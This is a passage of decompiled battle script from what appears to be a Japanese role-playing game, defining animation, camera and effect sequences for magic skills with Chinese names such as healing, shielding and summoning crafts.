label("Craft_41_65_3AF5")
Return()
# Craft_41_65_3AF5 end
def Craft_42_66_3AF6(): pass
label("Craft_42_66_3AF6")
Return()
# Craft_42_66_3AF6 end
def Craft_43_67_3AF7(): pass
label("Craft_43_67_3AF7")
Jump("Craft_11_17_D69")
# Craft_43_67_3AF7 end
def Craft_震天之符文(): pass
label("震天之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg068_00.eff")
LoadEffect(0x3B, "battle\\mg068_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg068_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 震天之符文 end
def Craft_混沌烙印(): pass
label("混沌烙印")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg070_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 750, 750, 750, -1)
Sleep(600)
Yield()
LockCamera(0xFE, 0, 1000, 0, 600)
Sleep(3000)
Yield()
LockCamera(0xFE, 0, 0, 0, 300)
AS_3D(300, 300, 300, 200)
Sleep(200)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 混沌烙印 end
def Craft_幻影之塔(): pass
label("幻影之塔")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg071_00.eff")
LoadEffect(0x1, "battle\\mg071_01.eff")
LoadEffect(0x2, "battle\\mg071_02.eff")
AS_78(0)
AS_43(0x0, 0x258, 0xFF000000)
LockCamera(0xFB, 0, 3000, 0, 600)
Sleep(600)
Yield()
SetBrightness(0x0, 0x0, 0)
Fade(0x0, 500, 0xFF000000)
AS_60(0xF7)
LockCamera(0xFB, 0, 3000, 0, 0)
SetCameraDegree(0, 10, 3, 0)
SetCameraDistance(25000, 0)
Sleep(300)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
LockCamera(0xFB, 0, 2000, 0, 0)
Sleep(1000)
Yield()
SetCameraDistance(18000, 2400)
AS_3D(100, 100, 100, 3000)
Sleep(400)
Yield()
LockCamera(0xFB, 0, 14000, -4000, 2800)
SetCameraDegree(15, -15, 5, 1800)
SetCameraDistance(30000, 1500)
Sleep(900)
Yield()
AS_43(0x0, 0x320, 0xFFFFFFFF)
Sleep(800)
Yield()
Fade(0x1, 500, 0xFFFFFFFF)
Sleep(150)
Yield()
PlayEffect(0xFF, 0xFB, 0x2, 0x0, 0, 18000, 0, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(1250)
Yield()
LockCamera(0xFB, 0, 18000, -2000, 2000)
Sleep(1000)
Yield()
AS_43(0x0, 0x1F4, 0x0)
Sleep(500)
Yield()
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
FreeEffect(0x0)
FreeEffect(0x2)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
AS_B0(0xA, 0x0)
LockCamera(0xFB, 0, 4000, 0, 0)
LockCamera(0xFB, 0, 0, 0, 4000)
SetCameraDistance(30000, 0)
SetCameraDistance(25000, 3000)
AS_5F(0xFC, 0x0)
PlayEffect(0xFF, 0xFB, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(100)
Yield()
AS_3D(100, 100, 100, 2000)
Sleep(500)
Yield()
AS_B0(0x14, 0xBB8)
Sleep(1500)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
Sleep(1000)
Yield()
SetBattleSpeed(700)
Sleep(200)
Yield()
SetBattleSpeed(500)
AS_43(0x0, 0x12C, 0xFFFFFFFF)
Sleep(400)
Yield()
SetBattleSpeed(1000)
CancelBlur(200)
Fade(0x1, 300, 0xFFFFFFFF)
ResetBrightness(0)
AS_31(0x17, 0x0)
CancelBlur(0)
SetBrightness(0x0, 0x1, 0)
AS_5F(0xF7, 0x1)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(0, 22, 32)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
Sleep(500)
Yield()
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
LockCamera(0xF2, 0, 0, 0, 0)
Return()
# 幻影之塔 end
def Craft_天国之门(): pass
label("天国之门")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg072_00.eff")
LoadEffect(0x1, "battle\\mg072_01.eff")
LoadEffect(0x2, "battle\\mg072_02.eff")
AS_78(0)
Sleep(300)
Yield()
LockCamera(0xFF, 0, 1500, 0, 600)
SetBrightness(0x0, 0x0, 500)
Sleep(500)
Yield()
Fade(0x1, 300, 0x0)
AS_60(0xF7)
SetCameraDegree(-45, 17, 0, 0)
LockCamera(0xF3, 0, 40000, 0, 0)
SetCameraDistance(27500, 0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xF3, 0x0, 0x0, 0, 40000, 0, 180, 0, 0, 1000, 1000, 1000, 4)
LockCamera(0xF3, 0, 41000, 0, 1000)
PlayEffect(0xFF, 0xF3, 0x2, 0x0, 0, 38000, 0, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(2500)
Yield()
Fade(0x1, 300, 0x0)
SetCameraDegree(0, 8, 0, 0)
SetCameraDistance(24000, 0)
Sleep(1200)
Yield()
SetCameraDistance(35000, 1000)
AS_B0(0xFFFD, 0x5DC)
Sleep(1200)
Yield()
AS_43(0x0, 0x258, 0x0)
ResetBrightness(500)
Fade(0x1, 600, 0x0)
CancelEffect(0xFF, 0x4)
CancelEffect(0xFF, 0x3)
FreeEffect(0x0)
FreeEffect(0x2)
LockCamera(0xF3, 0, 3000, 0, 0)
AS_31(0x17, 0x0)
AS_3A(0x23, 0x0)
AS_B0(0x23, 0x0)
SetCameraDistance(28000, 0)
AS_5F(0xF7, 0x0)
AS_3A(0xFFDD, 0x1194)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xF3, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
AS_B0(0x14, 0xDAC)
LockCamera(0xF3, 0, 0, 0, 3300)
Sleep(3300)
Yield()
SetCameraDistance(32000, 300)
AS_B0(0x20, 0x12C)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
SetBrightness(0x0, 0x1, 0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xF4, 0, 0, 0, 0)
AS_5F(0xF7, 0x1)
Return()
# 天国之门 end
def Craft_银色荆刺(): pass
label("银色荆刺")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg073_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 900, 900, 900, -1)
Sleep(600)
Yield()
LockCamera(0xFE, 0, 1000, 0, 600)
Sleep(3000)
Yield()
LockCamera(0xFE, 0, 0, 0, 300)
Sleep(200)
Yield()
label("loc_40A7")
ForeachTarget("loc_40B8")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(100)
Yield()
NextTarget()
Jump("loc_40A7")
label("loc_40B8")
AS_14(0x0)
FreeEffect(0x0)
Return()
# 银色荆刺 end
def Craft_幻银方舟炮(): pass
label("幻银方舟炮")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg074_00.eff")
LoadEffect(0x1, "battle\\mg074_01.eff")
LoadEffect(0x2, "battle\\mg074_02.eff")
LoadEffect(0x3, "battle\\mg074_03.eff")
LoadEffect(0x4, "battle\\com000.eff")
LoadEffect(0x5, "battle\\mg074_04.eff")
LoadEffect(0x6, "battle\\mg074_05.eff")
LoadEffect(0x7, "battle\\mg074_06.eff")
AS_8E(0x1, 0x0, "ef_ship")
AS_8E(0x7, 0x0, 0xFFFFFF, 0x0, 0x0, 0x0)
AS_78(0)
Call("loc_17D")
AS_3E(0xFA, 0x0)
AS_AC(0x7D0, 0xFFFFFFFF)
Fade(0x1, 500, 0x0)
SetBattleSpeed(700)
AS_34()
LockCamera(0xFD, 0, 2000, 10000, 0)
SetCameraDegree(35, 0, 0, 0)
SetCameraDistance(12000, 0)
SetCameraDistance(20000, 3500)
SetCameraDegree(45, -15, 0, 4500)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(300)
Yield()
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 2000, 10000, -20, 0, 0, 1000, 1000, 1000, 2)
SoundEx(359, 0x1)
Sleep(500)
Yield()
SetBattleSpeed(850)
Sleep(4500)
Yield()
SoundEx(239, 0x0)
AS_34()
LockCamera(0xFD, 700, 700, 4200, 1200)
SetCameraDegree(7, -23, -10, 1500)
SetCameraDistance(28500, 1500)
StopSound(359)
Sleep(2000)
Yield()
SetBattleSpeed(1000)
Fade(0x1, 500, 0x0)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
AS_34()
LockCamera(0xFD, -300, 700, 200, 0)
SetCameraDegree(227, -4, 0, 0)
SetCameraDistance(6000, 0)
AS_3E(0x258, 0x0)
LockCamera(0xFD, -300, 0, 200, 3000)
SetCameraDegree(233, -23, 0, 3000)
SetCameraDistance(7500, 3000)
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x1A2C)
SoundEx(239, 0x0)
Sleep(4500)
Yield()
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
Fade(0x1, 500, 0x0)
AS_3E(0x1F4, 0x0)
AS_5F(0xFC, 0x0)
AS_34()
LockCamera(0xF2, 0, 500, 0, 0)
SetCameraDegree(45, 20, 0, 0)
SetCameraDistance(26000, 0)
AS_3E(0x1F4, 0x0)
SetCameraDegree(90, 20, 0, 4000)
SetCameraDistance(29000, 4000)
AS_3E(0x320, 0xFA0)
AS_8E(0x7, 0x0, 0xFFFFFF, 0x0, 0x0, 0x0)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x6)
AS_A8(0x0, 0x2)
PlayEffect(0xFF, 0xF2, 0x3, 0x0, 0, 0, 0, 0, 0, 0, 900, 900, 900, -1)
Sleep(650)
Yield()
BeginChrThread(0xFF, 3, "loc_475F", 0x0)
Sleep(2500)
Yield()
EndChrThread(0xFF, 3)
AS_A8(0x0, 0x3)
Fade(0x1, 800, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFFFF, 0x0, 0x0, 0x0)
AS_8E(0x6, 0x0, 0xC8, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0x15E, 0x0, 0x0, 0x0)
AS_8E(0xB, 0x0, 0x4B0, 0x3E8, 0x3E8, 0x0)
AS_60(0xFC)
SoundEx(239, 0x0)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x2EE0)
AS_34()
LockCamera(0xFD, 0, 800, 20900, 0)
SetCameraDegree(185, -4, -1, 0)
SetCameraDistance(3700, 0)
AS_3E(0x3E8, 0x0)
AS_AC(0x3E8, 0xFFFFFFFF)
LockCamera(0xFD, -600, 1100, 20200, 3300)
SetCameraDegree(252, -8, -11, 3300)
SetCameraDistance(3200, 3300)
Sleep(2500)
Yield()
SetBattleSpeed(850)
Play3DEffect(0xFF, 0xEF, "Null_right01", 0x2, 0x1, 0, -50, -70, 0, 80, 0, 250, 250, 250, -1)
Play3DEffect(0xFF, 0xEF, "Null_left01", 0x2, 0x1, 0, -50, -70, 0, 280, 0, 250, 250, 250, -1)
SoundEx(258, 0x0)
Sleep(100)
Yield()
Play3DEffect(0xFF, 0xEF, "Null_right02", 0x2, 0x1, 0, -50, 0, 0, 90, 0, 250, 250, 250, -1)
Play3DEffect(0xFF, 0xEF, "Null_left02", 0x2, 0x1, 0, -50, 0, 0, 270, 0, 250, 250, 250, -1)
Sleep(100)
Yield()
Play3DEffect(0xFF, 0xEF, "Null_right03", 0x2, 0x1, 0, -50, 0, 0, 95, 0, 250, 250, 250, -1)
Play3DEffect(0xFF, 0xEF, "Null_left03", 0x2, 0x1, 0, -50, 0, 0, 265, 0, 250, 250, 250, -1)
Sleep(1000)
Yield()
SetBattleSpeed(1200)
LockCamera(0xFD, -1000, 600, 19900, 1200)
SetCameraDistance(6500, 1200)
SetCameraDegree(258, -16, -17, 1200)
SoundEx(321, 0x0)
BlurSwitch(0x0, 0xBBFFFFFF, 0x0, 0x1, 0xF)
Sleep(1500)
Yield()
CancelBlur(500)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x6)
AS_A8(0x0, 0x2)
Fade(0x1, 500, 0x0)
SetBattleSpeed(1000)
AS_3E(0x1F4, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFF, 0x0, 0x0, 0x0)
AS_34()
LockCamera(0xFD, -13500, 42000, -9900, 0)
SetCameraDegree(50, -3, 0, 0)
SetCameraDistance(14000, 0)
AS_3E(0x1F4, 0x0)
SetCameraDegree(50, 20, 0, 1000)
LockCamera(0xFD, -13500, 45000, -9900, 1000)
Sleep(200)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
PlayEffect(0xFF, 0xF2, 0x7, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
Sleep(350)
Yield()
CancelEffect(0xFF, 0x2)
SetBattleSpeed(700)
Sleep(700)
Yield()
AS_A8(0x0, 0x7)
Fade(0x1, 500, 0x0)
AS_3E(0x1F4, 0x0)
AS_5F(0xFC, 0x0)
AS_34()
LockCamera(0xF2, 0, 8000, 0, 0)
SetCameraDegree(45, 3, 0, 0)
SetCameraDistance(22000, 0)
AS_3E(0x1F4, 0x0)
SetCameraDegree(90, 20, 0, 2500)
LockCamera(0xF2, 0, 1500, 0, 1500)
Sleep(500)
Yield()
AS_3E(0x320, 0x9C4)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x6)
AS_A8(0x0, 0x2)
Sleep(200)
Yield()
SetBattleSpeed(1000)
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x1, 0xA)
PlayEffect(0xFF, 0xF2, 0x6, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(500)
Yield()
SetCameraDistance(25000, 2000)
BeginChrThread(0xFF, 3, "loc_475F", 0x0)
Sleep(2500)
Yield()
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
Sleep(1000)
Yield()
CancelBlur(500)
EndChrThread(0xFF, 2)
EndChrThread(0xFF, 3)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
AS_A8(0x0, 0x4)
AS_A8(0x0, 0x5)
AS_A8(0x0, 0x6)
AS_A8(0x0, 0x7)
Call("loc_1D5")
AS_8E(0x4, 0x0, 0x0, 0x0, 0x0, 0x0)
AS_6E(0x40000)
Call("loc_1A3")
Call("loc_1CA")
Return()
label("loc_475F")
AS_3D(200, 200, 200, 500)
BeginChrThread(0xFF, 2, "loc_37", 0x0)
WaitChrThread(0xFF, 2)
Yield()
Jump("loc_475F")
# 幻银方舟炮 end
def Craft_4B_75_4774(): pass
label("Craft_4B_75_4774")
Return()
# Craft_4B_75_4774 end
def Craft_4C_76_4775(): pass
label("Craft_4C_76_4775")
Return()
# Craft_4C_76_4775 end
def Craft_4D_77_4776(): pass
label("Craft_4D_77_4776")
Jump("Craft_11_17_D69")
# Craft_4D_77_4776 end
def Craft_幻影之符文(): pass
label("幻影之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg078_00.eff")
LoadEffect(0x3B, "battle\\mg078_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg078_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 幻影之符文 end
def Craft_大地治愈(): pass
label("大地治愈")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg080_00.eff")
AS_78(0)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(200, 20, 30)
Sleep(600)
Yield()
label("loc_4806")
ForeachTarget("loc_4831")
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4806")
label("loc_4831")
Sleep(1450)
Yield()
AS_14(0x0)
FreeEffect(0x0)
Return()
# 大地治愈 end
def Craft_结晶防护(): pass
label("结晶防护")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg081_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1800)
Yield()
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 结晶防护 end
def Craft_结晶防护复(): pass
label("结晶防护·复")
ResetTarget()
AS_78(1)
LoadEffect(0x1, "battle\\mg082_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
label("loc_48C1")
ForeachTarget("loc_48EC")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
DamageCue(0xFE)
NextTarget()
Jump("loc_48C1")
label("loc_48EC")
AS_14(0x1)
FreeEffect(0x1)
Return()
# 结晶防护·复 end
def Craft_坚韧守护(): pass
label("坚韧守护")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg083_00.eff")
LoadEffect(0x1, "battle\\mg083_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(950)
Yield()
label("loc_4958")
ForeachTarget("loc_4981")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4958")
label("loc_4981")
Sleep(2600)
Yield()
ResetTarget()
label("loc_4986")
ForeachTarget("loc_4993")
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4986")
label("loc_4993")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 坚韧守护 end
def Craft_54_84_499B(): pass
label("Craft_54_84_499B")
Return()
# Craft_54_84_499B end
def Craft_55_85_499C(): pass
label("Craft_55_85_499C")
Return()
# Craft_55_85_499C end
def Craft_56_86_499D(): pass
label("Craft_56_86_499D")
Return()
# Craft_56_86_499D end
def Craft_57_87_499E(): pass
label("Craft_57_87_499E")
Return()
# Craft_57_87_499E end
def Craft_强音之力(): pass
label("强音之力")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg088_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
SoundEx(197, 0x0)
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 强音之力 end
def Craft_强音之力复(): pass
label("强音之力·复")
ResetTarget()
AS_78(1)
LoadEffect(0x1, "battle\\mg088_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
label("loc_4A24")
ForeachTarget("loc_4A51")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(197, 0x0)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4A24")
label("loc_4A51")
AS_14(0x1)
FreeEffect(0x1)
Return()
# 强音之力·复 end
def Craft_振奋之激(): pass
label("振奋之激")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg090_00.eff")
LoadEffect(0x1, "battle\\mg090_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
SoundEx(201, 0x0)
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 200, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1350)
Yield()
label("loc_4AC5")
ForeachTarget("loc_4AF2")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(202, 0x0)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4AC5")
label("loc_4AF2")
Sleep(800)
Yield()
ResetTarget()
label("loc_4AF7")
ForeachTarget("loc_4B04")
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4AF7")
label("loc_4B04")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 振奋之激 end
def Craft_5B_91_4B0C(): pass
label("Craft_5B_91_4B0C")
Return()
# Craft_5B_91_4B0C end
def Craft_5C_92_4B0D(): pass
label("Craft_5C_92_4B0D")
Return()
# Craft_5C_92_4B0D end
def Craft_5D_93_4B0E(): pass
label("Craft_5D_93_4B0E")
Return()
# Craft_5D_93_4B0E end
def Craft_5E_94_4B0F(): pass
label("Craft_5E_94_4B0F")
Return()
# Craft_5E_94_4B0F end
def Craft_5F_95_4B10(): pass
label("Craft_5F_95_4B10")
Return()
# Craft_5F_95_4B10 end
def Craft_生命之息(): pass
label("生命之息")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg096_00.eff")
LoadEffect(0x1, "battle\\mg096_01.eff")
AS_78(0)
Sleep(125)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(800)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
label("loc_4B86")
ForeachTarget("loc_4BB5")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(8, 0x0)
DamageCue(0xFE)
Sleep(250)
Yield()
NextTarget()
Jump("loc_4B86")
label("loc_4BB5")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 生命之息 end
def Craft_圣灵之息(): pass
label("圣灵之息")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg097_00.eff")
LoadEffect(0x1, "battle\\mg097_01.eff")
AS_78(0)
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(500, 18, 20)
label("loc_4C2E")
ForeachTarget("loc_4C5D")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(8, 0x0)
DamageCue(0xFE)
Sleep(250)
Yield()
NextTarget()
Jump("loc_4C2E")
label("loc_4C5D")
Sleep(600)
Yield()
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 圣灵之息 end
def Craft_风之精灵(): pass
label("风之精灵")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg098_00.eff")
LoadEffect(0x1, "battle\\mg098_01.eff")
AS_78(0)
LockCamera(0xF4, 0, 1000, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xF2, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(500)
Yield()
LockCamera(0xF4, 0, 0, 0, 1500)
Sleep(4000)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
Sleep(1000)
Yield()
ResetTarget()
label("loc_4CF3")
ForeachTarget("loc_4D22")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(234, 0x0)
Sleep(200)
Yield()
DamageCue(0xFE)
NextTarget()
Jump("loc_4CF3")
label("loc_4D22")
WaitEffect(0xFF, 0x4)
AS_14(0x1)
Call("loc_1D5")
Return()
# 风之精灵 end
def Craft_大治愈术(): pass
label("大治愈术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg099_00.eff")
LoadEffect(0x1, "battle\\mg099_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x1, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1200)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
ResetTarget()
label("loc_4DA1")
ForeachTarget("loc_4DCA")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4DA1")
label("loc_4DCA")
BeginChrThread(0xFF, 3, "loc_15", 0x0)
WaitChrThread(0xFF, 3)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 大治愈术 end
def Craft_精灵之歌(): pass
label("精灵之歌")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg100_00.eff")
LoadEffect(0x1, "battle\\mg100_01.eff")
LoadEffect(0x2, "battle\\mg100_02.eff")
AS_78(0)
Sleep(200)
Yield()
Sleep(600)
Yield()
Fade(0x1, 500, 0x0)
AS_60(0xF7)
SetBrightness(0x0, 0x0, 300)
AS_34()
SetCameraDegree(35, 25, 0, 0)
SetCameraDistance(20000, 0)
LockCamera(0xF3, 0, 0, 0, 0)
PlayEffect(0xFF, 0xF3, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
AS_3D(150, 300, 150, 700)
Sleep(500)
Yield()
LockCamera(0xF3, 0, 4000, 0, 2000)
Sleep(1500)
Yield()
SetCameraDegree(-15, 40, 0, 2500)
PlayEffect(0xFF, 0xF3, 0x2, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2800)
Yield()
Fade(0x1, 500, 0x0)
SetCameraDegree(-100, 25, 0, 0)
SetCameraDistance(20000, 0)
LockCamera(0xF3, 0, 5000, -3000, 0)
SetCameraDegree(20, -20, 0, 2500)
Sleep(300)
Yield()
Sleep(500)
Yield()
LockCamera(0xF3, -2000, 0, -2000, 2000)
SetCameraDistance(30000, 2000)
Sleep(1000)
Yield()
SetBattleSpeed(700)
Sleep(1000)
Yield()
AS_43(0x0, 0x190, 0x0)
Sleep(400)
Yield()
FreeEffect(0x0)
Fade(0x1, 300, 0x0)
SetBattleSpeed(1000)
AS_31(0x17, 0x0)
ResetBrightness(0)
AS_5F(0xF7, 0x1)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(0, 25, 30)
ResetTarget()
label("loc_4F5B")
ForeachTarget("loc_4F86")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4F5B")
label("loc_4F86")
Sleep(2000)
Yield()
CancelBlur(500)
SetBrightness(0x0, 0x1, 0)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xF2, 0, 0, 0, 0)
Return()
# 精灵之歌 end
def Craft_65_101_4FBD(): pass
label("Craft_65_101_4FBD")
Return()
# Craft_65_101_4FBD end
def Craft_66_102_4FBE(): pass
label("Craft_66_102_4FBE")
Return()
# Craft_66_102_4FBE end
def Craft_67_103_4FBF(): pass
label("Craft_67_103_4FBF")
Return()
# Craft_67_103_4FBF end
def Craft_时间减速(): pass
label("时间减速")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg104_00.eff")
LoadEffect(0x1, "battle\\mg104_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(3300)
Yield()
ResetTarget()
label("loc_5028")
ForeachTarget("loc_5055")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(212, 0x0)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5028")
label("loc_5055")
Sleep(400)
Yield()
ResetTarget()
